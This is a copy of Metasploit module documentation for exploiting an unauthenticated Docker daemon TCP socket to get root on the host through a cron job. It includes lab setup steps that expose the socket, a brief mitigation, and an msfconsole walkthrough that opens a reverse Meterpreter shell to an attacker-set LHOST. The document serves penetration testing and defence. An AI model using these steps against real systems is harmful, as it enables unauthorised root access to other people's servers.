CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/http/docker_daemon_tcp.md
Views: 11789

Vulnerable Application

Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp with tls but without tls-auth), an attacker can create a Docker container with the '/' path mounted with read/write permissions on the host server that is running the Docker container. As the Docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owned by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server.

The Docker image should exist on the target system or be a valid image from hub.docker.com.

Docker Engine

By default, Docker runs via a non-networked unix socket. It can also optionally communicate using a tcp socket.

Warning: Changing the default docker daemon binding to a TCP port or Unix docker user group will increase your security risks by allowing non-root users to gain root access on the host. Make sure you control access to docker. If you are binding to a TCP port, anyone with access to that port has full Docker access; so it is not advisable on an open network. -- from docs.docker.com

This module was tested with Debian 9 and CentOS 7 as the host operating system and with Docker CE 17.06.0-ce and Docker Engine 1.13.1.

Install Debian 9

First install Debian 9 with default task selection. This includes the "standard system utilities".

Install Docker

Then install a supported version of Docker on Debian system.

# TL;DR
apt-get remove docker docker-engine
apt-get install apt-transport-https ca-certificates curl gnupg2 software-properties-common
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
# Verify that the key ID is 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88.
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"
apt-get update
apt-get install docker-ce
docker run hello-world

Activate unprotected tcp socket

Once Docker is installed, customize the Docker daemon options and add the tcp socket -H tcp://0.0.0.0:2375 option. On Debian override the settings from /lib/systemd/system/docker.service with a new file /etc/systemd/system/docker.service.

Further information: docker systemd and docker daemon options. 

# TL;DR
echo "[Service]
ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375" | tee /etc/systemd/system/docker.service
systemctl daemon-reload
systemctl restart docker
curl http://127.0.0.1:2375/_ping ; echo
OK

Mitigation

Disable or protect the Docker tcp socket.

User namespaces did not protect against this.

Exploitation

This module is designed for the attacker to leverage, creation of a Docker container with out authentication through the Docker tcp socket to gain root access to the hosting server of the Docker container.

Options

  • DOCKERIMAGE is the locally or from hub.docker.com available image you are wanting to have Docker to deploy for this exploit.

  • CONTAINER_ID if you want to have a human readable name for your container, else it will be randomly generated

Steps to exploit with module

  • Start msfconsole

  • use exploit/linux/http/docker_daemon_tcp

  • Set the options appropriately and set VERBOSE to true

  • Verify it creates a Docker container and it successfully runs

  • After a minute a session should be opened from the Docker server

Scenarios

msf > use exploit/linux/http/docker_daemon_tcp
msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23
RHOST => 192.168.66.23
msf exploit(docker_daemon_tcp) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf exploit(docker_daemon_tcp) > set LHOST 192.168.66.10
LHOST => 192.168.66.10
msf exploit(docker_daemon_tcp) > set VERBOSE true
VERBOSE => true
msf exploit(docker_daemon_tcp) > check
[+] 192.168.66.23:2375 The target is vulnerable.
msf exploit(docker_daemon_tcp) > run

[*] Started reverse TCP handler on 192.168.66.10:4444
[*] Check if images exist on the target host
[*] Image is not available on the target host
[*] Trying to pulling image from docker registry, this may take a while
[*] Setting container json request variables
[*] Creating the docker container command
[*] The docker container is created, waiting for deploy
[*] Waiting for the cron job to run, can take up to 60 seconds
[*] Waiting until the docker container stopped
[*] The docker container has been stopped, now trying to remove it
[*] Sending stage (2878936 bytes) to 192.168.66.23
[*] Meterpreter session 1 opened (192.168.66.10:4444 -> 192.168.66.23:35050) at 2017-07-25 14:03:02 +0200
[+] Deleted /etc/cron.d/lVoepNpy
[+] Deleted /tmp/poasDIuZ


meterpreter > sysinfo
Computer     : rancher
OS           : Debian 9.1 (Linux 4.9.0-3-amd64)
Architecture : x64
Meterpreter  : x64/linux
meterpreter >